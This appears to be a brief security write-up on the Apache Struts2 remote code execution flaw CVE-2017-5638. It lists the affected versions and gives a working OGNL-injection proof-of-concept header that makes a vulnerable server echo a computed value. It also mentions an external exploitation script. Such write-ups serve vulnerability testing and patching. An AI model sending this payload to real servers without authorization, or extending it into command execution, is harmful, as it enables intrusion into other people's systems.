RCE on Apache struts2 (CVE-2017-5638)

Description

The vulnerability CVE-2017-5638 is a Remote Code Execution in the Jakarta Multipart parser used by Apache struts2. The payload use a custom headers Content-Type, Content-Disposition or Content-Length.

The affected versions are:

• Apache Struts versions 2.3.x before 2.3.32
• Apache Struts versions 2.5.x before 2.5.10.1

Exploitation

If an endpoint has URL ending with .action, .do , .go it might be a web application running struts2.

Here is a small PoC, on a HTTP request add the following header:

Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Ack-POC', 7*7)}.multipart/form-data

With a vulnerable struts2 version, the server returns the following response header:

X-Ack-POC: 49

An exploitation script can be found here.